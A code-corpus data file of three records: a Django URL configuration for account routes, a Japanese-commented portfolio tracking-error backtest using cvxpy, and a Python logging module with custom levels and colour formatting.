+{"seq_id": "317494085", "text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'account'\nurlpatterns = [\n url(r'^$', views.show, name='show'),\n url(r'^save/$', views.save_list, name='save_list'),\n url(r'^import/$', views.import_page, name='import_page'),\n url(r'^import/submit$', views.import_csv, name='import_csv'),\n url(r'^export/$', views.export_csv, name='export_csv'),\n url(r'^customize/$', views.custom, name='customize'),\n url(r'^customize/(?P[0-9]+)/edit/$', views.edit, name='edit'),\n url(r'^customize/(?P[0-9]+)/edit/save$', views.edit_save, name='edit_save'),\n url(r'^customize/(?P[0-9]+)/remove/$', views.remove, name='remove'),\n url(r'^customize/(?P[0-9]+)/remove/confirm$', views.remove_confirm, name='remove_confirm'),\n] \n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "4928489", "text": "# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# SciPyのstatsモジュールの読み込み\nimport scipy.stats as st\n# CVXPYの読み込み\nimport cvxpy as cvx\n# Pandasの読み込み\nimport pandas as pd\n# MatplotlibのPyplotモジュールの読み込み\nimport matplotlib.pyplot as plt\n# 日本語フォントの設定\nfrom matplotlib.font_manager import FontProperties\nimport sys\nif sys.platform.startswith('win'):\n FontPath = 'C:\\\\Windows\\\\Fonts\\\\meiryo.ttc'\nelif sys.platform.startswith('darwin'):\n FontPath = '/System/Library/Fonts/ヒラギノ角ゴシック W4.ttc'\nelif sys.platform.startswith('linux'):\n FontPath = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\njpfont = FontProperties(fname=FontPath)\n#%% 収益率データの読み込みとベンチマークの生成\nR = pd.read_csv('asset_return_data.csv', index_col=0)\n# R = R.asfreq(pd.infer_freq(R.index)) # この行は無視する\nT = R.shape[0]\nN = R.shape[1]\nnp.random.seed(8888)\nBenchmarkIndex = R.dot(np.tile(1.0/N, N)) + st.norm(0.0, 3.0).rvs(T)\n#%% トラッキングエラー最小化問題のバックテスト\nMovingWindow = 96\nBackTesting = T - MovingWindow\nV_Tracking = np.zeros(BackTesting)\nWeight = cvx.Variable(N)\nError = cvx.Variable(MovingWindow)\nTrackingError = cvx.sum_squares(Error)\nAsset_srT = R / np.sqrt(MovingWindow)\nIndex_srT = BenchmarkIndex / np.sqrt(MovingWindow)\nfor Month in range(0, BackTesting):\n Asset = Asset_srT.values[Month:(Month + MovingWindow), :]\n Index = Index_srT.values[Month:(Month + MovingWindow)]\n Min_TrackingError = cvx.Problem(cvx.Minimize(TrackingError),\n [Index - Asset @ Weight == Error,\n cvx.sum(Weight) == 1.0,\n Weight >= 0.0])\n Min_TrackingError.solve(solver=cvx.ECOS)\n V_Tracking[Month] = R.values[Month + MovingWindow, :].dot(Weight.value)\n#%% バックテストの結果のグラフ\nfig1 = plt.figure(1, facecolor='w')\nplt.plot(list(range(1, BackTesting + 1)), BenchmarkIndex[MovingWindow:], 'k-')\nplt.plot(list(range(1, BackTesting + 1)), V_Tracking, 'k--')\nplt.legend([u'ベンチマーク・インデックス', u'インデックス・ファンド'],\n loc='best', frameon=False, prop=jpfont)\nplt.xlabel(u'運用期間(年)', fontproperties=jpfont)\nplt.ylabel(u'収益率(%)', fontproperties=jpfont)\nplt.xticks(list(range(12, BackTesting + 1, 12)),\n pd.date_range(R.index[MovingWindow], periods=BackTesting//12,\n freq='AS').year)\nplt.show()\n", "sub_path": "python/pyfin_min_tracking_error_ver1_1.py", "file_name": "pyfin_min_tracking_error_ver1_1.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.platform.startswith", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, 
{"api_name": "cvxpy.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 34, "usage_type": "call"}, {"api_name": "cvxpy.sum_squares", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "cvxpy.ECOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "9320961", "text": "\"\"\"\nUnicorn core.logutils module\nUnicorn module which provides common logging functions. \nIn order to initialize logger function init_logger should be used.\n\"\"\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport shutil\nimport re\nfrom datetime import datetime\nfrom threading import Lock\n\ntry:\n from core import logutils_conversions\n from core import environment_preparation\nexcept ImportError:\n import logutils_conversions\n import environment_preparation\n\ntry:\n import colorama\nexcept ImportError as e:\n colorama = None\nelse:\n colorama.init() \n\nloglock = Lock()\n \n# PATCHING CUSTOM LEVELS\nlogging.H1 = 99\nlogging.H2 = 98\nlogging.H3 = 97\nlogging.PLAIN = 29\nlogging.FRAME = 28\nlogging.TABLE = 27\nlogging.VERBOSE = 21\n\nlevel_styles = {}\nmessage_styles = {}\n\n\n\n# ==============================================================================\nclass EnhancedLogger(logging.getLoggerClass()):\n \"\"\"\n Logger class with additional methods / log levels.\n \"\"\"\n def __init__(self, name, level = logging.NOTSET):\n super().__init__(name, level)\n logging.addLevelName(logging.H1, \"H1\")\n logging.addLevelName(logging.H2, \"H2\")\n logging.addLevelName(logging.H3, \"H3\")\n logging.addLevelName(logging.TABLE, \"TABLE\")\n logging.addLevelName(logging.FRAME, \"FRAME\")\n logging.addLevelName(logging.PLAIN, \"PLAIN\")\n logging.addLevelName(logging.VERBOSE, \"VERBOSE\")\n \n def h1(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H1):\n msg = logutils_conversions._string_to_h1(msg)\n self._log(logging.H1, msg, args, **kwargs)\n \n def h2(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H2):\n msg = logutils_conversions._string_to_h2(msg)\n self._log(logging.H2, msg, args, **kwargs)\n \n def h3(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H3):\n msg = logutils_conversions._string_to_h3(msg)\n self._log(logging.H3, msg, args, **kwargs)\n \n def table(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.TABLE):\n msg = logutils_conversions._table_to_string(msg)\n self._log(logging.TABLE, msg, args, **kwargs)\n \n def frame(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.FRAME):\n msg = logutils_conversions._string_to_framed_string(msg)\n self._log(logging.FRAME, msg, args, **kwargs)\n \n def com(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def comment(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def plain(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def verbose(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.VERBOSE):\n msg = logutils_conversions._verbose_message_to_string(msg)\n self._log(logging.VERBOSE, msg, args, **kwargs)\n\n def configure(self, log_config={}, file=\"\"):\n \"\"\"\n Common function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. 
New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n\n # TODO function that initialize default values\n log_c = {\n \"log_fmt\": \"%(asctime)-16s - %(levelname)-8s - %(message)s\",\n \"log_path\": \"\",\n \"log_colors\": True,\n \"log_default_font\": \"\",\n \"log_default_back\": \"\",\n \"log_default_style\": \"\",\n \"log_debug_font\": \"white\",\n \"log_debug_back\": \"\",\n \"log_debug_style\": \"\",\n \"log_info_font\": \"green\",\n \"log_info_back\": \"\",\n \"log_info_style\": \"bright\",\n \"log_warning_font\": \"yellow\",\n \"log_warning_back\": \"\",\n \"log_warning_style\": \"bright\",\n \"log_error_font\": \"red\",\n \"log_error_back\": \"\",\n \"log_error_style\": \"bright\",\n \"log_critical_font\": \"white\",\n \"log_critical_back\": \"red\",\n \"log_critical_style\": \"bright\",\n \"log_header_font\": \"cyan\",\n \"log_header_back\": \"\",\n \"log_header_style\": \"bright\",\n \"log_verbose_font\": \"magenta\",\n \"log_verbose_back\": \"\",\n \"log_verbose_style\": \"bright\",\n \"log_strong_font\": \"yellow\",\n \"log_strong_back\": \"black\",\n \"log_strong_style\": \"\",\n \"log_send_font\": \"cyan\",\n \"log_send_back\": \"\",\n \"log_send_style\": \"bright\",\n \"log_receive_font\": \"yellow\",\n \"log_receive_back\": \"\",\n \"log_receive_style\": \"bright\",\n \"log_file_max_size\": \"0\",\n \"log_file_max_count\": \"0\",\n \"log_width\": 120,\n \"test_file\": \"\",\n \"file\": \"\" }\n log_c.update(log_config)\n logutils_conversions.LINE_WIDTH = log_c[\"log_width\"]\n if any(sub in str(log_c[\"log_colors\"]).lower() for sub in [\"1\", \"enable\", \"true\", \"yes\"]):\n log_c[\"log_colors\"] = True\n\n # TODO move to function close handlers\n handlers = self.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n self.removeHandler(hdlr)\n\n # TODO move to function set logging level, it would be good to use configuration parameter instead of directly parsing sys.argv\n if any(\"debug\" in ar.lower() for ar in sys.argv):\n level_to_set = logging.DEBUG\n else:\n level_to_set = logging.INFO\n self.setLevel(logging.DEBUG)\n self.propagate = 0\n\n # TODO move to function set formatter\n fmt = log_c[\"log_fmt\"]\n\n if colorama and log_c[\"log_colors\"] is True:\n handler = ColorStreamHandler(sys.stdout)\n cc_fmt = ColorFormatter(fmt)\n cc_fmt.configure(log_c)\n handler.setFormatter(cc_fmt)\n else:\n handler = logging.StreamHandler()\n c_fmt = CustomFormatter(fmt)\n handler.setFormatter(c_fmt)\n handler.setLevel(level_to_set)\n self.addHandler(handler)\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\")\n\n # TODO move to function set file handler\n log_dir_path = \"\"\n log_file_path = \"\"\n if log_c[\"log_path\"] and log_c[\"test_file\"]:\n log_dir_path = log_c[\"log_path\"]\n if os.path.isabs(log_dir_path): pass\n else: \n log_dir_path = os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\", log_dir_path))\n testname = os.path.basename(log_c[\"test_file\"])\n try:\n testname = os.path.splitext(testname)[0]\n except Exception as e:\n print(\"Could not remove extension from file named: {}. 
Skipping.\".format(testname))\n log_dir_name = \"{}_{}\".format(testname, timestamp)\n log_dir_path = os.path.realpath(os.path.join(log_c[\"log_path\"], log_dir_name))\n log_file_name = \"{}_{}_{}.log\".format(testname, timestamp, self.name)\n log_file_path = os.path.join(log_dir_path, log_file_name)\n elif file:\n log_dir_path = os.path.dirname(file)\n log_file_path = file\n if log_dir_path and not os.path.exists(log_dir_path):\n try:\n os.makedirs(log_dir_path)\n except Exception as ex:\n print(\"ERROR: Log directory {} could not be created\".format(log_dir_path))\n print(\n \"Please ensure that\\n\\t\\\"{}\\\"\\ndirectory exists or Unicorn has sufficient rights to create it.\".format(\n log_dir_path))\n raise ex from None\n\n if log_c[\"log_path\"] and file and os.path.isfile(file):\n shutil.copyfile(file, log_file_path)\n os.remove(file)\n\n if log_file_path:\n lfmc_text = str(log_c[\"log_file_max_size\"]).upper()\n lfmc_num = int(''.join(str(d) for d in [int(s) for s in list(lfmc_text) if s.isdigit()]))\n if lfmc_text.endswith(\"MB\") or lfmc_text.endswith(\"M\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024 * 1024\n elif lfmc_text.endswith(\"KB\") or lfmc_text.endswith(\"K\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024\n else:\n log_c[\"log_file_max_size\"] = lfmc_num\n if log_file_path:\n f_fmt = CustomFormatter(fmt)\n if log_c[\"log_file_max_size\"] > 0:\n from logging.handlers import RotatingFileHandler\n fh = RotatingFileHandler(log_file_path, maxBytes=log_c[\"log_file_max_size\"],\n backupCount=int(log_c[\"log_file_max_count\"]) )\n else:\n fh = logging.FileHandler(log_file_path)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(f_fmt)\n self.addHandler(fh)\n return self\n\n def close(self):\n \"\"\"\n Function to remove handlers and shut down the logger\n Args:\n logger (logger object)\n Returns:\n None\n \"\"\"\n try:\n handlers = self.handlers[:]\n for handler in handlers:\n handler.close()\n self.removeHandler(handler)\n del self\n except Exception as ex:\n pass \n\n\nclass ColorStreamHandler(logging.StreamHandler):\n \"\"\"\n StreamHandler with customized color output.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n def emit(self, record):\n try:\n loglock.acquire()\n message = self.format(record)\n self.stream.write(message)\n self.stream.write(getattr(self, 'terminator', '\\n'))\n self.flush()\n except (KeyboardInterrupt, SystemExit) as e:\n raise e\n except Exception:\n self.handleError(record)\n finally:\n loglock.release()\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"\n Formatter which selects modified log formats depending on the message LEVEL\n \"\"\"\n def __init__(self, fmt):\n self.general_fmt = \"%(asctime)-16s - %(levelname)-8s - %(message)s\"\n self.plain_fmt = \"%(asctime)-16s - %(message)s\"\n self.no_fmt = \"%(message)s\"\n # self.verbose_fmt = \"%(asctime)-16s - [ Logged from: %(module)s; line: %(lineno)d ]:\\n %(msg)s\"\n self.verbose_fmt = \"\\n %(msg)s\"\n if fmt: \n self.general_fmt = fmt\n super().__init__(fmt = self.general_fmt)\n\n def format(self, record, *args, **kwargs):\n new_record = copy.copy(record)\n format_orig = self._style._fmt\n if new_record.levelno == logging.DEBUG:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.INFO:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.WARNING or new_record.levelno == logging.WARN:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.ERROR or new_record.levelno == 
logging.CRITICAL:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.H1:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.H2:\n self._style._fmt = self.plain_fmt\n elif new_record.levelno == logging.H3:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.TABLE:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.FRAME:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.PLAIN:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.VERBOSE:\n self._style._fmt = self.verbose_fmt\n else:\n self._style._fmt = self.no_fmt\n result = logging.Formatter.format(self, new_record)\n self._style._fmt = format_orig\n return result\n\n\nclass ColorFormatter(CustomFormatter):\n \"\"\"\n Formatter which adds colors to messages going to the screen depending on message LEVEL\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.color_send = \"\"\n self.color_receive = \"\"\n self.color_strong = \"\"\n self.regex_send = re.compile(\"(.*?\\|.?\\-\\-\\>.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_receive = re.compile(\"(.*?\\|.?\\<\\-\\-.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_strong = re.compile(\"\\[(.*)\\]\", re.IGNORECASE | re.MULTILINE)\n\n def create_color_entry(self, colorama_assignments, style_name_lowercase):\n \"\"\"Method which assigns colorama style basing on global configuration stored in self.log_conf, \n styles dictionary colorama_dict and name of the style defined in style_name_lowercase\n self.log_conf - generated framework configuration for the logs (all parameters with log_ prefix) \n - taken from global config file, local config file, command line args and default settings.\n Args:\n colorama_assignments(dict) - assignments of logging level and colorama style\n style_name_lowercase(string) - value of configuration parameter. e.g. yellow\n Returns:\n colorama style(colorama attribute) - e.g. colorama.Style.BRIGHT\"\"\"\n try:\n log_param_value = self.log_conf[style_name_lowercase]\n except KeyError as e:\n log_param_value = \"\"\n try:\n return colorama_assignments[log_param_value]\n except (KeyError, Exception) as e:\n print(\"WARNING: Style or color name \\\"{}\\\" for {} was not recognized. 
Empty value will be used.\".format(log_param_value, style_name_lowercase))\n return \"\" \n \n def configure(self, log_conf):\n \"\"\"\n Method to set configuration of ColorFormatter from dictionary with log_ parameters.\n Args:\n log_conf(dictionary): configuration of the logger, keys are prefixed with log_\n Returns:\n None\n \"\"\"\n self.log_conf = log_conf\n self.level_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE\n }\n self.message_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE,\n logging.H1: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H2: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H3: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.VERBOSE: colorama.Style.BRIGHT + colorama.Fore.MAGENTA,\n logging.FRAME: \"\",\n logging.TABLE: \"\",\n logging.PLAIN: \"\"\n }\n self.colorama_styles = {\n \"bright\": colorama.Style.BRIGHT,\n \"dim\": colorama.Style.DIM,\n \"none\": \"\",\n \"\": \"\"\n } \n self.colorama_backgrounds = {\n \"red\": colorama.Back.RED,\n \"white\": colorama.Back.WHITE,\n \"green\": colorama.Back.GREEN,\n \"yellow\": colorama.Back.YELLOW,\n \"blue\": colorama.Back.BLUE,\n \"cyan\": colorama.Back.CYAN,\n \"magenta\": colorama.Back.MAGENTA,\n \"black\": colorama.Back.BLACK,\n \"\": \"\"\n } \n self.colorama_fonts = {\n \"red\": colorama.Fore.RED,\n \"white\": colorama.Fore.WHITE,\n \"green\": colorama.Fore.GREEN,\n \"yellow\": colorama.Fore.YELLOW,\n \"blue\": colorama.Fore.BLUE,\n \"cyan\": colorama.Fore.CYAN,\n \"magenta\": colorama.Fore.MAGENTA,\n \"black\": colorama.Fore.BLACK,\n \"\": \"\"\n }\n self.message_styles = {\n logging.DEBUG: self.create_color_entry(self.colorama_styles, \"log_debug_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_debug_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_debug_font\"),\n logging.INFO: self.create_color_entry(self.colorama_styles, \"log_info_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_info_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_info_font\"),\n logging.WARN: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.WARNING: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.ERROR: self.create_color_entry(self.colorama_styles, \"log_error_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_error_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_error_font\"),\n logging.CRITICAL: 
self.create_color_entry(self.colorama_styles, \"log_critical_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_critical_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_critical_font\"),\n logging.H1: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"),\n logging.H2: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.H3: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.VERBOSE: self.create_color_entry(self.colorama_styles, \"log_verbose_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_verbose_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_verbose_font\") \n }\n self.level_styles = dict(self.message_styles)\n self.color_send = self.create_color_entry(self.colorama_styles, \"log_send_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_send_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_send_font\")\n self.color_receive = self.create_color_entry(self.colorama_styles, \"log_receive_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_receive_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_receive_font\")\n self.color_strong = self.create_color_entry(self.colorama_styles, \"log_strong_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_strong_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_strong_font\")\n \n def _apply_special_styles(self, message):\n \"\"\"\n Method to apply special style to the message which matches expected format (based on regex search).\n It is called from \"format\" method\n It returns same message if no special match is found.\n Args:\n message (String): log entry to add the style\n Returns:\n message (String): colorized log entry\n \"\"\"\n if self.regex_send.search(message):\n return self.regex_send.sub(\"\\\\1\" + self.color_send + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_receive.search(message):\n return self.regex_receive.sub(\"\\\\1\" + self.color_receive + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_strong.search(message):\n return self.regex_strong.sub(self.color_strong + \"[\\\\1]\" + colorama.Style.RESET_ALL, str(message))\n else:\n return message\n\n def format(self, record, *args, **kwargs):\n \"\"\"\n Method to apply all color formats basing on self.level_styles and self.message_styles dictionaries.\n Args:\n record (String): log entry to add the style\n Returns:\n result (String): formatted log entry\n \"\"\" \n new_record = copy.copy(record) \n if isinstance(new_record.msg, str) and new_record.levelno == logging.PLAIN:\n new_record.msg = self._apply_special_styles(new_record.msg) \n if new_record.levelno in self.level_styles:\n new_record.levelname = \"{color_begin}{level}{color_end}\".format(\n color_begin = self.level_styles[new_record.levelno],\n level = new_record.levelname,\n color_end = colorama.Style.RESET_ALL,\n ) \n if new_record.levelno in self.message_styles:\n 
new_record.msg = \"{color_begin}{msg}{color_end}\".format(\n color_begin = self.message_styles[new_record.levelno],\n msg = new_record.msg,\n color_end = colorama.Style.RESET_ALL,\n )\n result = super(ColorFormatter, self).format(new_record, *args, **kwargs)\n return result\n\nlogging.setLoggerClass(EnhancedLogger)\n \n\ndef init_logger(name = \"log\", log_config = {}, file = \"\"): \n \"\"\"\n External function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n logger = logging.getLogger(name)\n logger.configure(log_config, file)\n return logger\n \n\nif __name__ == \"__main__\":\n\n logger = init_logger(\"test\")\n logger = init_logger(\"test\")\n\n logger.debug(\"This is a debug!\")\n logger.info(\"This is an info!\")\n logger.warning(\"This is a warning!\")\n logger.error(\"This is an error!\")\n logger.critical(\"This is a critical!\")\n\n logger.h1(\"1. Header\")\n logger.h2(\"1.1. Header\")\n logger.h3(\"1.1.1 Header\")\n\n logger.table([[\"Name\", \"Value\"],[1,2],[10,20],[30,40]])\n logger.com(\"Path [ AAA ] format\")\n logger.com(\"| --> D | Send format\")\n logger.com(\"| <-- D | Receive format\")\n logger.verbose([\n \"This is a long message\",\n \"which explains in details\",\n \"what is going on here\"\n ])\n logger.frame(\"Used for generic messages which should be emphasized\")\n logger.frame(\"Used for generic messages which should be emphasized\\n - like communication with the module\")\n logger.frame([\n \"Used for generic messages which should be emphasized\",\n \"- like communication with the module\"])\n try:\n i = 3/0\n except Exception as e:\n logger.verbose(\"You tried to do action which is not allowed. 
Handling exception.\")\n logger.info(\"[ c:\\\\temp ]\")\n", "sub_path": "unicorn_core/logutils.py", "file_name": "logutils.py", "file_ext": "py", "file_size_in_byte": 24390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 28, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLoggerClass", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.NOTSET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 55, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 57, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h1", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 64, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 67, "usage_type": "attribute"}, {"api_name": 